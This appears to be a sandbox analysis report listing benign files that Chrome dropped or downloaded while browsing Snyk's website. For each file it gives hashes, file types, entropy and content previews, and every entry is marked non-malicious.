                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.......S.....@.......pHYs..........+.....3tEXtComment.xr:d:DAFMIp6bb9g:2,j:35243528497,t:22091318..iw.."MIDATx....s.....P..I..)S..{.Jf..V...r.a.0...kNY.Ij<..b[.(.d.r.v*.D[..........B,..~............TA"..o5.......e.1..................G@...............................................................................................o.....1...+o..$Y...w...[]]V.g............H.l^.pL.n?.LpM.....#G|.<.....zN..G....].YG.......@..@./.......,c6o..@...h!....h...R.{..,K.......g.~C/.rV>.OJ.....>.`F..+Z].P.......~kP?|cTW.. ..............fB+...?U..dJ.X.......\<....o...\$$xF.g45.......g..sz.O.........b......j.-.......m.....|m......|Ro..KM<X...9..l.........$..JZ7.wR.............Z.H..1....i.....J..@...|R......M.j...'...~..hj.s..q}....7.03.........I.s......Z..p.(.....*..OB1=.rQ..5k.m'.q..?Ok6...|.5....[M7yf...h%...-a<.......<...(........r.>..X.........}.....P..JZ..l.g....V# ......z...+..k.Q-...$ou)......l..'.g.z...F..R$.5...hc....]...w.4;U.p...p.Q..3iG.?.+
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (61920), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):61963
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.139699308704602
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:5Dw3ioZbFiuzzyqKoWB1Z9D9i2HYlmE+70EMVvpxl+fm9re9PE8waMe:FwyKb4uzzXXC9D9hHxE+UXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:D4FD0D5E7C86A92157EDF5564B83E341
                                                                                                                                                                                                                                                                                                              SHA1:73EF2577FD03713DBD46FB2693B850E69C85258C
                                                                                                                                                                                                                                                                                                              SHA-256:620B4F4526FDB59D50AE33EF11E27F031E95B4D8A5B9F1D35CB4727F5F9904CB
                                                                                                                                                                                                                                                                                                              SHA-512:20F4BCA4705037921E480B5D9BCDCC6221468E2A8D754DCE698E2F046F60786A93AA730B6259A8D69CC7DB0F422A740F462303984CBD620C8D65B219029CE2C2
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"23INSHR9qwm8wUHnrFuZi5","type":"Entry","createdAt":"2023-10-12T14:03:17.218Z","updatedAt":"2024-06-24T19:55:33.515Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":34,"revision":8,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Secure AI generated code solutions page","title":"Secure AI Generated Code With Snyk | Snyk","slug":"secure-ai-generated-code-with-snyk-or-snyk","uri":"solutions/secure-ai-generated-code","pageLocalization":["ja","de","fr","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6lPtH2cnFbrCvsFokuZnW9","type":"Entry","createdAt":"2023-10-12T14:03:17.340Z","updatedAt":"2024-01-23T19:41:50.706Z","environ
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4880), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4880
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.832879020987701
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUipt7q:1DY0hf1bT47OIqWb1fpt2
                                                                                                                                                                                                                                                                                                              MD5:0FB94B41A5CE98E29BD27F1FF4BC9FB5
                                                                                                                                                                                                                                                                                                              SHA1:8AA03EDBCD80FF7EE638228410B8405BB7238C02
                                                                                                                                                                                                                                                                                                              SHA-256:449CD5EFEAA039BF212307289B414024FF6AAF11515C10D905EF0C49FBD3D846
                                                                                                                                                                                                                                                                                                              SHA-512:A47963D0669949BA25D7F25AF459B313580A4161F44B9EB13C07DA63611126B7C4661FC55711F790C6445D92F7AD0643A8E20B7CCFEE857E88ED8127167CAD6F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/923832244/?random=1729799399572&cv=11&fst=1729799399572&bg=ffffff&guid=ON&async=1&gtm=45be4al0v9101588801z89131853231za201zb9131853231&gcd=13r3r3r3r5l1&dma=0&tag_exp=101533422~101686685~101794737~101823847&u_w=1280&u_h=1024&url=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&hn=www.googleadservices.com&frm=0&tiba=See%20Snyk%20in%20action%20-%20Book%20a%20live%20demo%20%7C%20Snyk&did=dOThhZD&gdid=dOThhZD&npa=0&us_privacy=1YNY&pscdl=noapi&auid=1154500146.1729799382&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4
                                                                                                                                                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (54099), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):54126
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.166043855605311
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:a0vuvcEFkGk1ubsQ34kGkEBbw5rwgAyzhoEMVvpxl+fm9re9PE8waMe:NEFkGk1uB34kGkEm5rWXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:58B35F914157E308E93D27ADFD00977A
                                                                                                                                                                                                                                                                                                              SHA1:F76B408EEA0C7F2C03D352716AE160C24EC85014
                                                                                                                                                                                                                                                                                                              SHA-256:A2A72F19A7FECB600D45A24EA5383308A381E7F8E10EAA0FA2C5AC5ED7DE2DAE
                                                                                                                                                                                                                                                                                                              SHA-512:F911C648CAF14FA03276B51548B9C607871EE8D6D2784CD4D5A3D4E7ADD59CE930BF8A8DC485EBCFA962AD3CD93A02DEEBB6BD7050AB973D6A9549D729C12F98
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/security-leaders.json?slug=security-leaders
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5T18C5NkVlCQYogGTmD4hK","type":"Entry","createdAt":"2022-12-13T01:18:40.347Z","updatedAt":"2023-06-08T18:52:34.881Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":26,"revision":6,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Security Leaders page","title":"Resources for Security Leaders | Snyk","slug":"security-leaders","uri":"security-leaders","pageLocalization":["de","ja","fr"],"featuredImage":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1646599294/wordpress-sync/feature-resources-for-todays-and-tomorows-security-leaders.png","tags":null,"type":"upload","bytes":107309,"width":1200,"format":"png","height":628,"context":{"custom":{"guid":"6eb2ea205a542cceb3ec2a9ff221c9bb","caption":"feature-resources-for-
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):699
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.079570260069407
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:15RGidsk6n/GBw+C1WBNgqtu3XnxsSGlRdqbCDRWUkEHNj0vs3/tZb:/1sN7r+NZuHZGwmRWUnHZ0M/tZb
                                                                                                                                                                                                                                                                                                              MD5:51BDBE69AC61A93FB4878FB7D8CFCC64
                                                                                                                                                                                                                                                                                                              SHA1:5F4D6AE91DE6E5AAF58D19582B2D0B5B9CC4FA2D
                                                                                                                                                                                                                                                                                                              SHA-256:CBB87CD785B3599A96CC30DCC28DDB284226B85F354A44E71F510BFE8E07E1F5
                                                                                                                                                                                                                                                                                                              SHA-512:62812D48EF4B581867F1E0D7E2A3CAA13F03F0E8BF017FA24CFE58091D4FFE73AAA72500736DAFC59ABEBB642F2F860F99D058225FD40A347A4ADE966496D719
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:TRD_ACC_ID = typeof document !== 'undefined' ? parseInt(document?.querySelector('script[id="trendemon-script"]')?.getAttribute('data-id')) : null;.if (TRD_ACC_ID) {..// console.log('Trendemon Running');..(function (w, d) {...function go() {....var trdti = setInterval(function () {.....if (document.readyState === 'complete') {......var bi = document.createElement('script');......bi.type = 'text/javascript';......bi.async = true;......bi.src = 'https://assets.trendemon.com/tag/trends.min.js';......bi.id = 'trdflame';......var s = document.getElementsByTagName('script')[0];......s.parentNode.insertBefore(bi, s);......clearInterval(trdti);.....}....}, 500);...}...go();..})(window, document);.}.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4966), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4966
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.396546111298508
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:lAAZwbFT+/hwSYDU+ZkrTnJTJT+/5wKHQY1KWU8dsZLlfPuhnxqTqQFekYo6:3mFT+/+GmkrTJTJT+/Gw1KTisllH4nxD
                                                                                                                                                                                                                                                                                                              MD5:32184F45375DF417F0C5C5F30657E84E
                                                                                                                                                                                                                                                                                                              SHA1:0A1557B78380770EE80DDAC126DDE8D70BDB909C
                                                                                                                                                                                                                                                                                                              SHA-256:CAF93B54F26165ED6F24BE571848AA441268C2992A3416F0EB95655763343E91
                                                                                                                                                                                                                                                                                                              SHA-512:80FF21D30517A5B1B68450A81CD3BD0CDBFACE37F3097AF4AF179C9225E73EE4E861F630F1D062CBF267367FBC5FEFEEE2F6D2027B90F4B35DD4C2F996A987C7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[330],{29792:function(e,n,l){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[...slug]",function(){return l(52538)}])},11223:function(e,n,l){"use strict";var i=l(85893),o=l(5152),d=l.n(o),a=l(45697),t=l.n(a),s=l(9981),r=l(23751);let u=d()(()=>l.e(572).then(l.bind(l,40572)),{loadableGenerated:{webpack:()=>[40572]}}),c=d()(()=>Promise.all([l.e(6122),l.e(3602)]).then(l.bind(l,3602)),{loadableGenerated:{webpack:()=>[3602]}}),v=d()(()=>l.e(5662).then(l.bind(l,65662)),{loadableGenerated:{webpack:()=>[65662]}});function b(e){var n,l,o,d,a,t;let{component:b}=e,p=(0,r.bU)(),{sys:f,fields:h}=b,m={moleculeAlert:u,organismFeatureCta:c,organismFooterCta:v,DEFAULT:(0,i.jsx)("section",{className:"brandui-section",children:(0,i.jsx)("div",{className:"brandui-container",children:(0,i.jsxs)("p",{className:"pad-small bg-base-rose txt-fail radius-large",children:[(0,s.t)("errorRendering",p)," ",(0,i.jsx)("strong",{children:null==f?void 0:null===(l=f.co
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 18588, version 1.0
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):18588
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.988601596032928
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:WF9srt3EJfKy7iOpqErJeqQhzsaZqPTPabcoqYdBTKYPvS9BlTf:Wn6UhKYieqAiPQTwclYQLlTf
                                                                                                                                                                                                                                                                                                              MD5:115C2D84727B41DA5E9B4394887A8C40
                                                                                                                                                                                                                                                                                                              SHA1:44F495A7F32620E51ACCA2E78F7E0615CB305781
                                                                                                                                                                                                                                                                                                              SHA-256:AE0E442895406E9922237108496C2CD60F4947649A826463E2DA9860B5C25DD6
                                                                                                                                                                                                                                                                                                              SHA-512:00402945111722B041F317B082B7103BCC470C2112D86847EAC44674053FC0642C5DF72015DCB57C65C4FFABB7B03ECE7E5F889190F09A45CEF1F3E35F830F45
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                                                                                                                                              Preview:wOF2......H........ ..H8................................|.`..J.\..<........-..Z...x.6.$..0. .... ..S.7.5..K!.;..../.`..Sn.J.e.52P.(.....=9....f.....$...*.fZ.p...N...t....6.lfS.Ju.i.o.g..<....T"O.o..4..4....M/N.>.K..."[.P...W.u.>]................A.9z....IN^....z..Y.{....m=...+X9<?.......(IA*G8rD....52L0.p .EJ..p....=.......[U...pz..g...../L.U.......P..W.U..q$L..6......C.M.0..R..........D(.ilX.Y..SZ.R...Q..j.6.@\."|.l......3....,.T.....L...ap0......6.j.\&O.z`*.$.*_+vwnr...,....?W.T....!.J...L#%.......A}........\.....l...:....U..u.J.0....O......&.!.)4.V..:.}.0f....:W......?U.....%...b...!....yA.sw.....5..T .}{.t!F.G....{"..pQ.S.v.S....t......U.Y|.v.@....|..(..V.........^....../.7......K......J.Uq/L.T-.`.O........;........';vWq.+....J...J..p.....sB`(1LC.k....?Z{...v>dS....F..........\.....UetU........6.V...vE....._.../...%.q...^.l...>^.z..l..p....j..@H...`X.p...KQ. .<@...I...BF.......L..6...y.2=.P....8;..@`.m.....R.B.L.r.*T.T..l@.6.Y....}g.....F.n...
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (31988)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):70103
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.350957695758152
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:L+i0S1TpywbZi31SPTnODPEGnVbg94ePcwD4wP1nN69X1SiraqXztGV51Au+:qY7ZbpwDw1y
                                                                                                                                                                                                                                                                                                              MD5:7E1853E10A9F3C69AF99931DDCEE9138
                                                                                                                                                                                                                                                                                                              SHA1:3CFF5AE87ED02DE01F327DBF0DAB0FA39A469C97
                                                                                                                                                                                                                                                                                                              SHA-256:56DF5BF2317BC2156B954C3FD2913AFCCE23EB4947C47F3AC401017DC4A0151D
                                                                                                                                                                                                                                                                                                              SHA-512:474FB64341A56957391FE59E39BB1152EE6EC534B577C95CF6E4B5D00846F70621DDB2FFED62FEF06B3A9EA796E560110F657A890B70F311A083C29D6E76AD2F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://j.6sc.co/6si.min.js
                                                                                                                                                                                                                                                                                                              Preview:!function(){var t={},e={},n={},i={},r={},o={},a={},s={},u={},l={},c={},d={},f={},h={},p={},m={},v={},b={},y={},g={},w={},_={},E={},k={},S={},C={},T={},F={},x={},A={},I={},M={},U={},L={},P={},N=this&&this.__spreadArray||function(t,e,n){if(n||2===arguments.length)for(var i,r=0,o=e.length;r<o;r++)!i&&r in e||(i||(i=Array.prototype.slice.call(e,0,r)),i[r]=e[r]);return t.concat(i||Array.prototype.slice.call(e))},D=this&&this.__extends||function(){var t=function(e,n){return(t=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&(t[n]=e[n])})(e,n)};return function(e,n){function i(){this.constructor=e}if("function"!=typeof n&&null!==n)throw new TypeError("Class extends value "+String(n)+" is not a constructor or null");t(e,n),e.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}(),O=this&&this.__assign||function(){return O=Object.assign||function(t){for(var e,n=1,i=argument
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):34
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.925410635240724
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:YAPRe1Kyn:YAPU
                                                                                                                                                                                                                                                                                                              MD5:E14FDCEC0992A480EC965CE10C0E45E6
                                                                                                                                                                                                                                                                                                              SHA1:AD26C5CB7FAAEC70B9C38836410164FDD0CB143A
                                                                                                                                                                                                                                                                                                              SHA-256:E2D4644E397E8A723F389E039DC8D0659F61B965963C59B90BED4A1D0FB9EB4F
                                                                                                                                                                                                                                                                                                              SHA-512:DD3F19920D7E8570B9D480C83FED051F89BBCE4F3EDB542533AFE9B48DB0517DF180E8BA778FB5B4CC9D93128B879CC0C4432D45693920BBB368C6CA91D78787
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"error":"Failed to authenticate"}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):147108
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5803005055641925
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:+jEcqpGMZsqe1/VuVOoaaPeU8zPkS/Ae7uKhgQnRaVohs0V6Nnk6dRLnOgIAox+Q:yAOJMOgZoUQ
                                                                                                                                                                                                                                                                                                              MD5:FBD5502595F9F5D3F06B2D4696ED051F
                                                                                                                                                                                                                                                                                                              SHA1:AF41615F2888FBD172F5DD289589629269CAA6C2
                                                                                                                                                                                                                                                                                                              SHA-256:2E80A7FB5F519CAF032F672FF2DAF9112977F90C46703A91B029A17ED1FF1F30
                                                                                                                                                                                                                                                                                                              SHA-512:35545EC5664C41DA859BA3E1D115CE7ABE9A128EE054410F4C9EFDE95F65C037AA0446EDC8E4D64A6DF820FBC6F7BA941793AF7ECF678731BE7B3028E1A06591
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg width="619" height="396" viewBox="0 0 619 396" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_2_2)">.<mask id="mask0_2_2" style="mask-type:luminance" maskUnits="userSpaceOnUse" x="0" y="0" width="619" height="396">.<path d="M607 0H12C5.37258 0 0 5.37258 0 12V384C0 390.627 5.37258 396 12 396H607C613.627 396 619 390.627 619 384V12C619 5.37258 613.627 0 607 0Z" fill="white"/>.</mask>.<g mask="url(#mask0_2_2)">.<path d="M607 0H12C5.37258 0 0 5.37258 0 12V384C0 390.627 5.37258 396 12 396H607C613.627 396 619 390.627 619 384V12C619 5.37258 613.627 0 607 0Z" fill="white"/>.<path d="M140.037 0H86.3391C81.9455 0 78.3838 3.56169 78.3838 7.95526V61.6532C78.3838 66.0468 81.9455 69.6085 86.3391 69.6085H140.037C144.431 69.6085 147.992 66.0468 147.992 61.6532V7.95526C147.992 3.56169 144.431 0 140.037 0Z" fill="white"/>.<path d="M61.6532 0H7.95526C3.56169 0 0 3.56169 0 7.95526V61.6532C0 66.0468 3.56169 69.6085 7.95526 69.6085H61.6532C66.0468 69.6085 69.6085 66.0468 69.608
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3587
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.413361854287383
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:tTPKtZFFdsI9SLNWv5A7DpbTSUxP46pYLNawCtt2vbYEHHWe8/S1:47vGNlpSwPjYLN9Z863
                                                                                                                                                                                                                                                                                                              MD5:582B35A024C0902327703A8FF75D2D5F
                                                                                                                                                                                                                                                                                                              SHA1:78722B75AED1CCADC6B14EB3200E9ADABFD2FC0D
                                                                                                                                                                                                                                                                                                              SHA-256:D84679011B54AEC124A7830DDA77C13C7A92DD6DF963DFD65810F23BF7E79D22
                                                                                                                                                                                                                                                                                                              SHA-512:D7C33CC40BB1A30D105B5527165FA6B932D8AD3C977253F460C75DF353C733A05C4B270D7FD5EBDE8C9B42C77995CFC8E5597FE23832967EA0D17BE6E35091CD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="4" x2="60.496" y1="4" y2="52.6512"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#0a26b8"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="28.3332" x2="66.166" y1="22" y2="52.3044"><stop offset="0" stop-color="#4bd6b5"/><stop offset="1" stop-color="#145deb"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m51.9364 21.2666-6.6299-2.0912-.0034-.0011c-.7398-.2324-1.5332-.2324-2.2731 0l-15.0378 4.7434-.0045.0014c-.7964.2503-1.4885.7566-1.9682 1.4411-.4626.66-.7024 1.4498-.6855 2.2544v9.4456c0 6.4154 1.3109 11.885 4.2948 16.297 1.6803 2.4843 3.8244 4.535 6.3953 6.2017-.3513.4411-.6127.4411-.9609.4411h-5.8632c-.9128 0-1.2208 0-4.2392-7.6216l-2.3296-.9688c-6.3504 2.94-7.1008 2.94-7.3528 2.94h-.4872l-.4144-.364-4.172-4.1664c-.6328-.644-.8512-.868 2.4136-8
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4856), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4856
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.398512426691865
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:dA79puLE/pwbbDUgSVEFkbL/RwruFZTtnKO6:EkLE/WYgsEwL/O6fBnP6
                                                                                                                                                                                                                                                                                                              MD5:BDC1B111B7E9CC4AEA2860B03E1808D6
                                                                                                                                                                                                                                                                                                              SHA1:C4663AACD7FDEC8198DCF798558E0D4F4FD0FD44
                                                                                                                                                                                                                                                                                                              SHA-256:758F96440C3D83AD296819E80C1905D321AA0B5AE0EE9A03AFEC312F4958D610
                                                                                                                                                                                                                                                                                                              SHA-512:31E6644C6C263D4C145D9DC178778E36343E056035307AC03B403FF15901565E2F9C163FD9234FD7A92C55204CDA1EB9FE6E5E648AD62A9F6C529B73A5A263B9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{45728:function(e,n,i){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return i(68107)}])},11223:function(e,n,i){"use strict";var l=i(85893),o=i(5152),d=i.n(o),a=i(45697),t=i.n(a),r=i(9981),s=i(23751);let c=d()(()=>i.e(572).then(i.bind(i,40572)),{loadableGenerated:{webpack:()=>[40572]}}),u=d()(()=>Promise.all([i.e(6122),i.e(3602)]).then(i.bind(i,3602)),{loadableGenerated:{webpack:()=>[3602]}}),v=d()(()=>i.e(5662).then(i.bind(i,65662)),{loadableGenerated:{webpack:()=>[65662]}});function b(e){var n,i,o,d,a,t;let{component:b}=e,p=(0,s.bU)(),{sys:f,fields:h}=b,m={moleculeAlert:c,organismFeatureCta:u,organismFooterCta:v,DEFAULT:(0,l.jsx)("section",{className:"brandui-section",children:(0,l.jsx)("div",{className:"brandui-container",children:(0,l.jsxs)("p",{className:"pad-small bg-base-rose txt-fail radius-large",children:[(0,r.t)("errorRendering",p)," ",(0,l.jsx)("strong",{children:null==f?void 0:null===(i=f.contentTyp
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (738), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):738
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.72325415847929
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:BR2awV5B8/m+/quznFu+OPx90+WP+/yiJEvvgfHfjum9dXn:6nVfsm+/dQzPx9mP+yiJEv0HfyMp
                                                                                                                                                                                                                                                                                                              MD5:8606DD534193A9C6F42925CEAB334554
                                                                                                                                                                                                                                                                                                              SHA1:2434ABE998EE4C986EF8B609C6F8759B5692FD95
                                                                                                                                                                                                                                                                                                              SHA-256:4B5CA810D29591FA58F9643F2D97FE26AE3637AE5F91F2A470688F7E76876024
                                                                                                                                                                                                                                                                                                              SHA-512:0EE52C0F28CE81E6D44E08C047275EE6416672DB05B73C6CAE133AFB713E08B717FB51414C82CAA5FC8A8AF652654B8F29AA25251AECA2ABD0F0F9B3886EE2C1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/Cp4abAN54CGUdTYwS0J62/_ssgManifest.js
                                                                                                                                                                                                                                                                                                              Preview:self.__SSG_MANIFEST=new Set(["\u002F","\u002F404","\u002F[...slug]","\u002Fappsecmap\u002Fshare","\u002Farticles\u002F[...slug]","\u002Fblog\u002F[slug]","\u002Fcase-studies\u002F[slug]","\u002Fcode-checker","\u002Fcode-checker\u002F[...slug]","\u002Fevents\u002F[slug]","\u002Flearn\u002F[...slug]","\u002Flearn\u002Ftopic\u002F[slug]","\u002Flp\u002F[slug]","\u002Fnews\u002F[slug]","\u002Fpodcasts\u002Fthe-secure-developer\u002F[slug]","\u002Fpolicies\u002F[slug]","\u002Fprocurement\u002F[slug]","\u002Freports","\u002Freports\u002F[slug]","\u002Fschedule-a-demo","\u002Fsecuritylabs","\u002Fseries","\u002Fseries\u002F[...slug]","\u002Fstart\u002F[slug]","\u002Fvideos\u002F[slug]"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()
